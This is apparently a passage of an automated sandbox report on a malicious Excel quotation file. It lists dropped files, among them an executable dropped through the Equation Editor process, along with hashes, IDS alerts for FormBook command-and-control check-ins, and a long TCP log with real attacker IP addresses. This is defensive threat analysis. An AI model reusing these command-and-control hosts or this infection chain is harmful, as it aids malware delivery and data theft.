                                          SHA1:C242B70AAA47AA1844412103F8CAEA1077AB476F
                                          SHA-256:6E888B831004EE7215F9E411B88AA2F59806B9E59CBDC03AD00646EC5F9258AB
                                          SHA-512:E2ED68FF05CDB585BA5688C6BFE0419D38E1550BFB8FBA914E0A053E94F189F9364BF308B9935897ECEF25A11C52C85B8484D15767B0FE476DD3395FFE86D095
                                          Malicious:false
                                          Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................\$.....X..f.\.@..%.....X...X.....t.X...X.RQ.]t.X.l.X.......X.X.X.$Q.]t.X.l.X. ...Id.\l.X.t.X. ............d.\........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............X.X...l.X...X..8.\........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1602797.png
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):65050
                                          Entropy (8bit):7.959940260382877
                                          Encrypted:false
                                          SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                                          MD5:22335141D285E599CDAEF99EABA59D5B
                                          SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                                          SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                                          SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                                          Malicious:false
                                          Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3DA066E.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                          Category:dropped
                                          Size (bytes):8815
                                          Entropy (8bit):7.944898651451431
                                          Encrypted:false
                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                          MD5:F06432656347B7042C803FE58F4043E1
                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                          Malicious:false
                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                          C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsx
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):330
                                          Entropy (8bit):1.4377382811115937
                                          Encrypted:false
                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                          Malicious:true
                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          C:\Users\Public\vbc.exe
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):685568
                                          Entropy (8bit):7.6030295284828995
                                          Encrypted:false
                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                          MD5:50568FB6133EE4ED721EE46A3C0A9E98
                                          SHA1:4897B6F2141395071652F72D34DC3D39EB014A56
                                          SHA-256:2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
                                          SHA-512:D5FACFCF30E3E9F815F595C3AF6992551D623A5592C13E7AE8DF4E29E7F6401523339BF5A7835D46C80B998FDC3338530EA677F85A08C4FE16829A83879F529F
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Joe Sandbox View:
                                          • Filename: MV HULDA MAERSK.xlsx, Detection: malicious, Browse
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qa..............0..j.............. ........@.. ....................................@.....................................O.......`............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...`............l..............@..@.reloc...............t..............@..B.......................H........C...............6...Q.........................................."..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..q........(........(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.....*j...(......

                                          Static File Info

                                          General

                                          File type:CDFV2 Encrypted
                                          Entropy (8bit):7.989352625928742
                                          TrID:
                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                          File name:(QUOTATION)B-RUS-20061REV2.xlsx
                                          File size:469848
                                          MD5:ecd068fb962c5a9452a6f22c0725521c
                                          SHA1:fdf1a902181584d47cb1aed7ac2ca333dcc62e5e
                                          SHA256:3c3d0f13af1ccf38e72804d40b87dc215813ff6b36a20137d48c4a565c5a5c2e
                                          SHA512:75e4df2f994c3d582b67a92cc101122a4cb2bf59a8b6d7db6d6733fa8d816a48884a9386a2b34ff2bf625a272a818719e945eaf32bdaa01057bef581f37364e9
                                          SSDEEP:12288:mHyL81K5G0hgFJQDyq+pNuI2WLp3/Ou3edGpJP:mSL15G0gkyq+pF9bpR
                                          File Content Preview:........................>...............................................................................{......................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4e2aa8aa4b4bcb4

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-14:04:12.525746TCP2022566ET TROJAN Possible Malicious Macro EXE DL AlphaNumL4916580192.168.2.22180.214.239.85
                                          09/27/21-14:04:12.525746TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.22180.214.239.85
                                          09/27/21-14:05:31.207248TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22128.65.195.232
                                          09/27/21-14:05:31.207248TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22128.65.195.232
                                          09/27/21-14:05:31.207248TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22128.65.195.232
                                          09/27/21-14:05:49.561791TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 14:04:12.153249025 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:12.524741888 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.525026083 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:12.525746107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:12.877863884 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.877912045 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.877931118 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.877960920 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:12.878079891 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.248920918 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.248961926 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.248976946 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.248989105 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249036074 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249063969 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249087095 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249170065 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.249202013 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.249236107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608402967 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608434916 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608526945 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608530045 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608567953 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608568907 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608588934 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608654022 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608685017 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608726978 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608755112 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608772993 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608789921 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608789921 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608807087 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608810902 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.608822107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.608844995 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609534025 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609596968 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609721899 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609759092 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609762907 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609792948 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.609841108 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.609874010 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.611052036 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956279039 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956306934 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956321001 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956332922 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956346989 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956367016 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956384897 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956459045 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956475973 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956554890 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956649065 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956666946 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956676960 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956682920 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956705093 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956712961 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956722975 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956739902 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956743956 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956763029 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956763029 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956789970 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956815958 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956829071 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956846952 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956865072 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956882000 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.956892967 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.956918001 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957036018 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957119942 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957277060 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957330942 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957556963 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957616091 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957717896 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957752943 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957763910 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957789898 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957792044 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957832098 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957835913 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957876921 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:13.957879066 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.957916975 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:13.960515976 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338285923 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338298082 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338323116 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338340998 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338356972 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338376045 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338399887 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338401079 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338434935 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338455915 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338485003 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338640928 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338656902 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338671923 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338680983 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338687897 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338697910 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338752031 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338761091 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338784933 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338820934 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338830948 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338846922 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338865042 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338865995 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338882923 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338885069 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338898897 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338905096 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338913918 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338916063 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338931084 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338939905 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338958979 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338958979 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.338965893 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.338989973 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339073896 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339090109 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339106083 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339129925 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339137077 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339145899 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339154959 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339164019 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339179039 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339184999 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339195013 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339198112 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339214087 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339226007 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.339226961 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.339257956 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.341573954 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343641043 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343679905 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343688011 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343698025 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343713045 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343713999 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343729973 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343733072 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343750000 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343771935 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343841076 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343858957 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343889952 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343899965 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343914986 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343939066 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343956947 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343969107 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.343977928 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.343985081 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344016075 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344018936 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344049931 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344057083 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344063044 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344083071 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344090939 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344125032 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344130993 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344178915 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344185114 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344202995 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344208956 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344234943 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344238997 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344285011 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.344338894 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.344371080 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.349610090 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.688812971 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.688890934 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.689971924 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.689995050 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.690007925 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.690041065 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.690066099 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.690066099 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.690090895 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.690095901 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.690114975 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.690119028 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.690139055 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.690143108 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.690162897 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.690201044 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.691914082 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.691951036 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.691972971 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.691982985 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.692001104 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.692019939 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.692058086 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692084074 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692104101 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.692107916 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692131042 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692169905 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692214966 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692238092 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692274094 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692296028 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692361116 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692388058 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692413092 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692435980 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692481041 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692532063 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692554951 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.692580938 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:14.702095985 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:14.702120066 CEST4916580192.168.2.22180.214.239.85
